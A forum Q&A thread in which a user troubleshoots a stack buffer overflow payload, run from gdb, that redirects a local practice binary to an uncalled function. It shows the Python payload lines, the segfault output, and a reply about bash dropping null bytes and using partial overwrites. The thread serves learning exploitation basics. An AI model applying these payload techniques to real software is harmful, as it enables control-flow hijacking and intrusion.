Bufferoverflow for small return address



  • I am using buffer overflow to overwrite the return address and calls another function. The name of function I call by overwriting the return address is not_called. Here is how I create the payload

    (gdb) r $(python -c 'import sys; sys.stdout.write("A"*0x6c + "BBBB"+"\x3b\x42\x08\x08")')
    

    The program works in the above case and not_called function is called. The problem arises when address of not_called is in this format : 0x57d. When I create payload as follows :

    (gdb) r $(python -c 'import sys; sys.stdout.write("A"*0x6c + "BBBB"+"\x7d\x05\x00\x00")')
    

    I get the following error and program won't work.

    (gdb) r $(python -c 'import sys; sys.stdout.write("A"*0x6c + "BBBB"+"\x7d\x05\x00\x00")')
    The program being debugged has been started already.
    Start it from the beginning? (y or n) y
    Starting program: /home/aditya/Desktop/victim $(python -c 'import sys; sys.stdout.write("A"*0x6c + "BBBB"+"\x7d\x05\x00\x00")')
    /bin/bash: warning: command substitution: ignored null byte in input
    0xffffd07c
    
    Program received signal SIGSEGV, Segmentation fault.
    0x5600057d in ?? ()
    

    If you look at address at SIGSEV, it is 0x5600057d, it should have been 0x0000057d.

    For example, If I try some random address as 0x3412057d, you can see that seg fault occurs at that address.

    Starting program: /home/aditya/Desktop/victim $(python -c 'import sys; sys.stdout.write("A"*112 +"\x7d\x05\x12\x34")')
    0xffffd06c
    
    Program received signal SIGSEGV, Segmentation fault.
    0x3412057d in ?? ()
    
    

    I can see that function bash is also giving some warning with null bytes. Dows this have to do something ? How can I pass such a small address ?



  • The issue is not that the address is "small", but that you are trying to print null bytes (\x00) as a shell argument. This is not possible with bash, to my knowledge, as it uses null-terminated strings.

    Depending on the program and exploit, if the memory you are overwriting already contains null bytes, you may not need to write them again. For example, you may be able to do a partial overwrite with just \x7d\x05.



Suggested Topics

  • 2
  • 2
  • 2
  • 2
  • 2
  • 2
  • 2
  • 2